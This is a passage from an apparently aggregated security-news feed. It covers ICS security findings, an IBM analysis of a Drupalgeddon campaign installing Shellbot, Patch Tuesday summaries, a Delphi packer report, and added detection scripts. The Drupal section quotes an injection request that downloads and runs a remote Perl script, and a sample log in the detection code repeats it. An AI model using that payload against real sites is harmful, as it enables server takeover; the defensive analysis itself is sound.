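The shadowing check is deliberately first-match: once rule 3 accepts everything, rules 4 and 5 can never fire, and rule 4 also contradicts rule 1, which is the "conflicting or overlapping rules" finding from the assessments. A rule that survives this audit can still be wrong for the architecture (rule 1 lets a corporate /16 talk Modbus straight to a control server), which is why the segmentation review in the previous section is a separate exercise.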

Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We highly suggest organizations implement ICS security programs to prioritize the following recommendations:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP 800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. While the trends observed in this research align with risk areas commonly discussed in security conference talks and media reports, this blog draws from dozens of on-site assessments that hold real-life validity.

Our findings indicate that roughly one third (32 percent) of the critical and high security risks in ICS are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners that must oversee the daily operation of thousands of assets in complex industrial environments. It is also relevant to highlight that some of the most common risks we identified could be mitigated with security best practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or to request Mandiant services, please visit our website.

Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers

IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP address: 31.204.80.133

Suspicious request: /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64.15.78.216 /lip;perl;cd /tmp;curl -O 64.15.78.216 /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that serve a Perl script which launches the Shellbot malware, and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both flaws have been patched, but vulnerable sites persist because site owners delay patching and upgrading.

As we continued to look into the attack, we observed the attackers scanning vulnerable websites for the /user/register and /user/password pages during the installation phase, while also trying to brute-force their way in with user credentials discovered earlier, as they attempted to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.
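Detection logic for the request shape quoted above, added here as an example and not taken from the IBM post: it parses access-log lines in common log format, decodes the query string without splitting on ';' and without letting a raw '#' be treated as a URL fragment, and flags parameter names that carry a Drupal render property (the `[#post_render]`, `[#markup]`, `[#type]` pattern), shell commands in parameter values, and the /user/register and /user/password paths the campaign probed. The log lines, the IP addresses (RFC 5737 documentation ranges) and all function names are constructed for this example.

```python
"""Flag Drupalgeddon-style render-array injection in web server access logs (example code)."""
import re
from urllib.parse import unquote_plus

# Form API render properties abused in CVE-2018-7600/7602 exploitation.
# A legitimate form submission never contains a '#'-prefixed key.
RENDER_KEYS = {"post_render", "pre_render", "lazy_builder", "access_callback",
               "markup", "type", "children"}
SHELL_HINTS = re.compile(r"\b(?:wget|curl|passthru|exec|system|shell_exec|perl|python|sh)\b", re.I)
TARGET_PATHS = ("/user/register", "/user/password")   # form paths the campaign probed
# Common log format: ip ident user [time] "METHOD target HTTP/x" status size
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')


def parse_params(query: str):
    """Split a query string or form body into decoded (key, value) pairs; only '&' separates pairs."""
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote_plus(key), unquote_plus(value)))
    return params


def render_array_keys(params):
    """Parameter names that smuggle a render property, e.g. name[#post_render][]."""
    hits = []
    for key, _ in params:
        m = re.search(r"\[#([a-z_]+)\]", key)
        if m and m.group(1) in RENDER_KEYS:
            hits.append(key)
    return hits


def scan_request(target: str, body: str = ""):
    """Return the reasons a request looks like Drupalgeddon exploitation (empty list = clean)."""
    path, _, query = target.partition("?")      # not urlsplit(): a raw '#' would start a fragment
    params = parse_params(query) + parse_params(body)
    q = dict(params).get("q", "")               # Drupal without clean URLs: /?q=user/password
    drupal_path = "/" + q.strip("/") if q else unquote_plus(path)
    reasons = []
    hits = render_array_keys(params)
    if hits:
        reasons.append("render-array property in parameter name: " + ", ".join(hits))
    for key, value in params:
        if SHELL_HINTS.search(value) and ("[#" in key or ";" in value or "|" in value):
            reasons.append(f"shell command carried in parameter {key!r}")
            break
    if reasons and any(drupal_path.startswith(p) for p in TARGET_PATHS):
        reasons.append(f"targets {drupal_path}, a form path the campaign scanned")
    return reasons


def scan_log(text: str):
    """Return (client ip, request target, reasons) for every suspicious log line."""
    alerts = []
    for line in text.splitlines():
        m = CLF.match(line)
        if m:
            reasons = scan_request(m["target"])
            if reasons:
                alerts.append((m["ip"], m["target"], reasons))
    return alerts


# Constructed log lines (RFC 5737 documentation addresses). The second mirrors the
# request shape quoted above, with spaces URL-encoded as they would be on the wire;
# the third sends the same keys percent-encoded; the fourth is a normal password reset.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Sep/2018:10:01:02 +0000] "GET /node/12 HTTP/1.1" 200 5120
198.51.100.9 - - [20/Sep/2018:10:01:05 +0000] "POST /?q=user/password&name[#type]=markup&name[#markup]=cd%20/tmp;wget%20198.51.100.9/lip;perl%20lip&name[#post_render][]=passthru HTTP/1.1" 200 812
198.51.100.9 - - [20/Sep/2018:10:01:09 +0000] "GET /user/register?name%5B%23post_render%5D%5B%5D=exec&name%5B%23type%5D=markup&name%5B%23markup%5D=id HTTP/1.1" 200 812
203.0.113.8 - - [20/Sep/2018:10:02:11 +0000] "POST /user/password?name=alice HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target[:60], reasons)
```

Access logs normally carry only the request line, so the Drupal 8 variant of the attack, which delivers the render keys in a POST body, is only visible if the body is logged by a WAF or the application; `scan_request` accepts that body as its second argument for that case.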

Shellbot Resurfaces

Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, at the height of exploitation of the Apache Struts flaw (CVE-2017-5638), ShellBot was bundled as the C&C component of the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100,000 in illicit profits.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Serve sites over HTTPS and keep the TLS configuration current, upgrading if need be.
  • Update CMSs to the most recent version and apply all available patches.
  • Perform input validation on all web applications so that no end user can cause shell commands to run. Validation must happen on the server side; client-side checks are a usability aid only and are trivially bypassed, so they cannot be relied on to keep scripting and malicious code off the underlying server or database.
  • Attackers will try to brute-force credentials; make sure passwords are strong and are stored as salted hashes produced by a slow password-hashing function, never encrypted or in plaintext. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.

The post Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers appeared first on Security Intelligence.

Goodbye Google Plus – Google Plans Google+ Shut Down After Data Breach

For all Google+ users, here comes some bad news. Google has announced to sunset Google Plus as a consequence of

Goodbye Google Plus – Google Plans Google+ Shut Down After Data Breach on Latest Hacking News.

Security Vulnerabilities in US Weapons Systems

The US Government Accountability Office just published a new report: "Weapons Systems Cyber Security: DOD Just Beginning to Grapple with Scale of Vulnerabilities" (summary here). The upshot won't be a surprise to any of my regular readers: they're vulnerable.

From the summary:

Automation and connectivity are fundamental enablers of DOD's modern military capabilities. However, they make weapon systems more vulnerable to cyber attacks. Although GAO and others have warned of cyber risks for decades, until recently, DOD did not prioritize weapon systems cybersecurity. Finally, DOD is still determining how best to address weapon systems cybersecurity.

In operational testing, DOD routinely found mission-critical cyber vulnerabilities in systems that were under development, yet program officials GAO met with believed their systems were secure and discounted some test results as unrealistic. Using relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected, due in part to basic issues such as poor password management and unencrypted communications. In addition, vulnerabilities that DOD is aware of likely represent a fraction of total vulnerabilities due to testing limitations. For example, not all programs have been tested and tests do not reflect the full range of threats.

It is definitely easier, and cheaper, to ignore the problem or pretend it isn't a big deal. But that's probably a mistake in the long run.

TrendLabs Security Intelligence Blog: October Patch Tuesday: Microsoft Repairs JET Database Engine Bug, Win32K EoP Zero-Day

This month’s Patch Tuesday fixes a JET Database Engine vulnerability (CVE-2018-8423) that Trend Micro’s Zero Day Initiative (ZDI) disclosed last September together with proof-of-concept code. The vulnerability, rated Important, is triggered when a user opens a specially crafted file containing data in the JET database format; parsing the file causes the JET database engine to perform an out-of-bounds write, which can lead to remote code execution. This month, Microsoft released 49 patches and two advisories, with 12 listed as Critical, 35 as Important, one Moderate, and one Low. Of the 49 CVEs, eight were disclosed through the ZDI program.

The patch release also fixed a vulnerability that’s currently under active attack: CVE-2018-8453, a Win32K elevation of privilege zero-day discovered by security researchers from Kaspersky Lab. To exploit this bug, an attacker must first successfully log into the system. However, once a system is infiltrated, an attacker can install programs as well as view, modify, or even delete data. It can also allow attackers to create new accounts with full user rights on an infiltrated system. This month’s patch corrects how Win32K handles objects in memory.

Meanwhile, on the Adobe front, a massive 86 CVEs were patched in total. On October 1, early patches were released for both Acrobat and Reader, while additional patches for Flash, Framemaker, Adobe Digital Editions, and the Adobe Technical Communications Suite were released on Patch Tuesday. 47 of the bugs are listed as Critical, and a total of 14 were handled by the ZDI.

Trend Micro™ Deep Security and Vulnerability Protection protect user systems from any threats that may target the vulnerabilities addressed in this month’s round of updates via the following DPI rules:

  • 1004373 – Identified DLL Side Loading Attempt Over Network Share (CVE-2010-3190)
  • 1009330 – Microsoft MFC Insecure Library Loading Vulnerability Over Network Share (CVE-2010-3190)
  • 1009331 – Microsoft Filter Manager Elevation Of Privilege Vulnerability (CVE-2018-8333)
  • 1009333 – Microsoft Windows Theme API Remote Code Execution Vulnerability (CVE-2018-8413)
  • 1009335 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8460)
  • 1009336 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8491)
  • 1009337 – Microsoft Windows Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2018-8492)
  • 1009338 – Microsoft Windows Shell Remote Code Execution Vulnerability (CVE-2018-8495)
  • 1009339 – Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8505)
  • 1009340 – Microsoft Windows Multiple Security Vulnerabilities (Oct-2018)
  • 1009341 – Microsoft MFC Insecure Library Loading Vulnerability Over WebDAV (CVE-2010-3190)

Trend Micro™ TippingPoint™ customers are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 32732: HTTP: Microsoft Internet Explorer msCrypto Use-After-Free Vulnerability
  • 33120: SMB: Microsoft Windows Out-of-Bounds Write Vulnerability
  • 33124: HTTP: Microsoft Windows DirectX Information Disclosure Vulnerability
  • 33132: HTTP: Microsoft Edge Windows Shell Memory Corruption Vulnerability
  • 33134: HTTP: Microsoft Edge Chakra JIT Type Confusion Vulnerability
  • 33147: HTTP: Microsoft PowerShell XML/XSL COM Instantiation and Transformation Usage

The post October Patch Tuesday: Microsoft Repairs JET Database Engine Bug, Win32K EoP Zero-Day appeared first on TrendLabs Security Intelligence Blog.

Microsoft Patch Tuesday — October 18: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 49 vulnerabilities, 12 of which are rated "critical," 34 that are rated "important,” two that are considered to have “moderate” severity and one that’s rated as “low.”

The advisories cover bugs in the Chakra scripting engine, the Microsoft Edge internet browser and the Microsoft Office suite of products, among other software.

This update also includes a critical advisory that covers updates to the Microsoft Office suite of products.

Critical vulnerabilities

Microsoft has disclosed 12 critical vulnerabilities this month, which we will highlight below.


CVE-2018-8491, CVE-2018-8460 and CVE-2018-8509 are memory corruption vulnerabilities in the Internet Explorer web browser. In all three cases, an attacker needs to trick the user into visiting a specially crafted, malicious website that can corrupt the browser’s memory, allowing for remote code execution in the context of the current user. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8473 is a remote code execution vulnerability in Microsoft Edge. The bug lies in the way the web browser accesses objects in memory. An attacker could trick a user into visiting a malicious website or take advantage of a website that accepts user-created content or advertisements in order to exploit this vulnerability.

CVE-2018-8513, CVE-2018-8500, CVE-2018-8511, CVE-2018-8505 and CVE-2018-8510 are memory corruption vulnerabilities in the Chakra scripting engine that affect a variety of products. In all cases, an attacker could exploit these vulnerabilities to execute code on the system in the context of the current user and completely take over the system. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8494 is a remote code execution vulnerability that exists when the MSXML parser in Microsoft XML Core Services processes user input. An attacker can exploit this bug by invoking MSXML through a web browser on a specially crafted website. The attacker also needs to convince the user to open the web page.

CVE-2018-8490 and CVE-2018-8489 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. The bugs lie in the way the host server on Hyper-V fails to properly validate input from an authenticated user on a guest operating system. An attacker could exploit these vulnerabilities by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

Important vulnerabilities

There are also 34 important vulnerabilities in this release. We would like to specifically highlight 22 of them.

CVE-2018-8512 is a security feature bypass vulnerability in Microsoft Edge. The web browser improperly validates certain specially crafted documents in the Edge Content Security Policy (CSP), which could allow an attacker to trick a user into loading a malicious page.

CVE-2018-8448 is an elevation of privilege vulnerability in the Microsoft Exchange email server. The bug exists in the way that Exchange Outlook Web Access improperly handles web requests. An attacker could exploit this vulnerability by performing script or content injection attacks that trick the user into disclosing sensitive information. They could also trick the user into providing login credentials via social engineering in an email or chat client.

CVE-2018-8453 is an elevation of privilege vulnerability in the Windows operating system that occurs when the Win32k component improperly handles objects in memory. An attacker could obtain the ability to run arbitrary code in kernel mode by logging onto the system and then run a specially crafted application.

CVE-2018-8484 is an elevation of privilege vulnerability in the DirectX Graphics Kernel driver that exists when the driver improperly handles objects in memory. An attacker could log onto the system and execute a specially crafted application to exploit this bug and run processes in an elevated context.

CVE-2018-8423 is a remote code execution vulnerability in the Microsoft JET Database Engine that could allow an attacker to take control of an affected system. A user must open or import a specially crafted Microsoft JET Database Engine file on the system in order to exploit this bug. They could also trick a user into opening a malicious file via email.

CVE-2018-8502 is a security feature bypass vulnerability in Microsoft Excel when the software fails to properly handle objects in protected view. An attacker could execute arbitrary code in the context of the current user if they convince the user to open a specially crafted, malicious Excel document via email or on a web page. This bug cannot be exploited if the user opens the Excel file in just the preview pane.

CVE-2018-8501 is a security feature bypass vulnerability in Microsoft PowerPoint. The bug exists when the software improperly handles objects in protected view. An attacker can execute arbitrary code in the context of the current user if they convince the user to open a specially crafted PowerPoint file. This bug cannot be exploited if the user only opens the file in preview mode.

CVE-2018-8432 is a remote code execution vulnerability that lies in the way Microsoft Graphics Components handles objects in memory. A user would have to open a specially crafted file in order to trigger this bug.

CVE-2018-8504 is a security feature bypass vulnerability in the Microsoft Word word processor. There is a flaw in the way the software handles objects in protected view. An attacker could obtain the ability to arbitrarily execute code in the context of the current user if they convince the user to open a malicious Word document. The bug cannot be triggered if the user opens the file in preview mode.

CVE-2018-8427 is an information disclosure vulnerability in Microsoft Graphics Components. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, which would expose memory layout.

CVE-2018-8480 is an elevation of privilege vulnerability in the Microsoft SharePoint collaborative platform. The bug lies in the way the software improperly sanitizes a specially crafted web request to an affected SharePoint server. An attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

CVE-2018-8518, CVE-2018-8488 and CVE-2018-8498 are elevation of privilege vulnerabilities in the Microsoft SharePoint Server. An attacker can exploit these bugs by sending a specially crafted request to an affected SharePoint server, allowing them to carry out cross-site scripting attacks and execute code in the context of the current user.

CVE-2018-8333 is an elevation of privilege vulnerability in Filter Management that exists when the program improperly handles objects in memory. An attacker needs to log onto the system and delete a specially crafted file in order to exploit this bug, which could lead to them gaining the ability to execute code in the context of an elevated user.

CVE-2018-8411 is an elevation of privilege vulnerability that exists when the NTFS file system improperly checks access. An attacker needs to log onto the system to exploit this bug and then run a specially crafted application, which could lead to the attacker running processes in an elevated context.

CVE-2018-8320 is a security feature bypass vulnerability that exists in the DNS Global Blocklist feature. An attacker who exploits this bug could redirect traffic to a malicious DNS endpoint.

CVE-2018-8492 is a security bypass vulnerability in the Device Guard Windows feature that could allow an attacker to inject malicious code into Windows PowerShell. An attacker needs direct access to the machine in order to exploit this bug, and then inject malicious code into a script that is trusted by the Code Integrity policy. The malicious code would then run with the same access level as the script, and bypass the integrity policy.

CVE-2018-8329 is an elevation of privilege vulnerability in Linux on Windows. The bug lies in the way Linux improperly handles objects in memory. An attacker can completely take control of an affected system after logging onto the system and running a specially crafted application.

CVE-2018-8497 is an elevation of privilege vulnerability that exists in the way the Windows Kernel handles objects in memory. A locally authenticated attacker can exploit this bug by running a specially crafted application.

CVE-2018-8495 is a remote code execution vulnerability that exists in the way Windows Shell handles URIs. An attacker needs to convince the user to visit a specially crafted website on Microsoft Edge in order to exploit this vulnerability.

CVE-2018-8413 is a remote code execution vulnerability that exists when the “Windows Theme API” improperly decompresses files. An attacker can exploit this bug by convincing the user to open a specially crafted file delivered via email, a chat client message or a malicious web page, allowing the attacker to execute code in the context of the current user.

Other important vulnerabilities:

Moderate vulnerabilities

Of the two moderate vulnerabilities disclosed by Microsoft, Talos believes one is worth highlighting.

CVE-2010-3190 is a remote code execution vulnerability in the way that certain applications built using Microsoft Foundation Classes handle the loading of DLL files. An attacker could take complete control of an affected system by exploiting this vulnerability. At the time this bug was first disclosed, Exchange Server was not identified as an in-scope product, which is why this release highlights a flaw from 2010.

The other moderate vulnerability is CVE-2018-8533.

Low vulnerability

There is also one low-rated vulnerability, which Talos wishes to highlight.

CVE-2018-8503 is a remote code execution vulnerability in the way that Chakra scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker needs to convince a user to visit a malicious website or malicious content on a web page that allows user-created content or advertisements in order to exploit this bug.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 48045 - 48057, 48058 - 48060, 48062, 48063, 48072, 48073

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by wrapping their payloads in code that is not itself malicious. In particular, packers use executable compression, so the payload on disk is smaller and no longer resembles the original binary until the packer’s stub decompresses it in memory at run time. The Delphi packer adds to this by watching for window activity and mouse cursor movement; if it sees none, it assumes it is running in a sandbox environment and puts itself into an infinite sleep so that no malicious behaviour is ever observed.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.
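As an added example (not code from the FireEye or IBM writeups), the following script applies the classic triage heuristic for packed binaries that the preceding paragraphs imply: it walks the PE section table and computes per-section Shannon entropy, since compressed or encrypted payloads sit close to 8 bits per byte, and it also flags sections that are both writable and executable, the footprint of an unpacking stub writing code into memory before jumping to it. The two PE images it checks are assembled inline by a helper and are not real or loadable executables; the section names, the 7.0 bits/byte threshold and the “packed” filler derived from a SHA-256 chain are assumptions made for the demonstration.

```python
"""Heuristic check for packed PE files: per-section entropy plus section permissions (example code)."""
import hashlib
import math
import struct
from collections import Counter

PE_SIGNATURE_OFFSET = 0x3C      # e_lfanew lives here in the DOS header
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
HIGH_ENTROPY = 7.0              # bits per byte; compressed/encrypted data sits near 8.0

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Parse the section table; yields (name, raw_offset, raw_size, characteristics)."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, PE_SIGNATURE_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _machine, n_sections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + COFF_HEADER_SIZE + opt_size
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + i * SECTION_HEADER_SIZE)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size, chars


def packer_report(image: bytes):
    """One dict per section; 'suspicious' marks high entropy or a writable+executable section."""
    report = []
    for name, raw_ptr, raw_size, chars in pe_sections(image):
        ent = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
        executable = bool(chars & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(chars & IMAGE_SCN_MEM_WRITE)
        report.append({"section": name, "entropy": round(ent, 2), "executable": executable,
                       "writable": writable,
                       "suspicious": ent >= HIGH_ENTROPY or (executable and writable)})
    return report


def looks_packed(image: bytes) -> bool:
    return any(s["suspicious"] for s in packer_report(image))


# --- constructed test images: minimal PE layouts, not loadable executables ---

def build_sample_pe(sections):
    """Assemble a DOS header, COFF header (no optional header), section table and raw section data."""
    n = len(sections)
    headers_len = 0x40 + 4 + COFF_HEADER_SIZE + n * SECTION_HEADER_SIZE
    dos = b"MZ" + b"\0" * (PE_SIGNATURE_OFFSET - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x0102)   # i386, SizeOfOptionalHeader = 0
    table, body, raw_ptr, va = b"", b"", headers_len, 0x1000
    for name, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
        va += 0x1000
    return dos + b"PE\0\0" + coff + table + body


def pseudo_random_bytes(n: int, seed: bytes = b"packer-demo") -> bytes:
    """Deterministic high-entropy filler standing in for a compressed or encrypted payload."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


CLEAN_IMAGE = build_sample_pe([
    (".text", b"mov eax, [ebp+8]; test eax, eax; jz short done; " * 80,   # structured, low entropy
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", b"\0" * 512 + b"config=1\0",
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
PACKED_IMAGE = build_sample_pe([
    (".text", b"\0" * 64,                         # empty, writable+executable: the stub unpacks here
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".pack", pseudo_random_bytes(4096),          # the compressed payload
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_IMAGE), ("packed", PACKED_IMAGE)):
        print(label, looks_packed(img), packer_report(img))
```

The heuristic is a triage signal, not proof: legitimately compressed resources and embedded certificates also score high, so a hit should route the sample to a sandbox that models user behaviour, which is exactly what the packer's mouse-movement check is trying to defeat.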

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior. The threat advisory on IBM X-Force Exchange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers that are available in dark web marketplaces.

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

Mozilla Patched Two Critical Vulnerabilities In Firefox

Mozilla endeavors to play safe for its browsers by fixing the flaws as it spots them. Once again, Mozilla has

Mozilla Patched Two Critical Vulnerabilities In Firefox on Latest Hacking News.

Mozilla Patched Multiple Vulnerabilities In Thunderbird 60.2.1

Mozilla’s email client Thunderbird exhibited several security flaws that posed a threat to users’ security. As reported, upon discovering these

Mozilla Patched Multiple Vulnerabilities In Thunderbird 60.2.1 on Latest Hacking News.

A week in security (October 1 – 7)

Last week, Malwarebytes welcomed National Cybersecurity Awareness Month by renewing our pledge to do what we do best: offer the best protection for our customers and promote security awareness for all.

On Labs, we raised the question of whether it is a good idea to bring your own security or not, talked a little bit more about fileless malware, homed in on a malware campaign targeting Fortnite gamers, and looked into LoJack, a bootkit malware that has been targeting government entities.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 1 – 7) appeared first on Malwarebytes Labs.

Researchers Find 18 Security Vulnerabilities in Foxit PDF Reader

A free application for creating, editing and viewing PDF files contains 18 security vulnerabilities that could expose users to remote code execution, researchers warned.

According Cisco Talos, the Foxit PDF Reader, which is often used in place of Adobe’s Acrobat application, was designed to securely open protected documents and notify users when new versions of a PDF have been created. The vulnerabilities are primarily found in the product’s JavaScript engine, which was designed to support interactive and dynamic documents, such as PDFs.

How Could the Security Vulnerabilities Be Exploited?

Closing a document frees objects that the JavaScript engine may still hold references to while it continues to run; a later access through one of those dangling references is a use-after-free condition. Threat actors can take advantage of this window of opportunity to execute arbitrary code, steal data or perform other malicious actions.

To execute the attack, the researchers noted that, in most cases, the cybercriminals would first need to fool a Foxit user into opening a malicious file. Once any of the 18 security vulnerabilities has been triggered, however, the attacker could run arbitrary commands on the victim’s system.

The researchers did not report any instances of users being impacted by the flaws, but they noted that a patch is available that covers all 18 vulnerabilities.

Mitigating the Rush-to-Release Effect

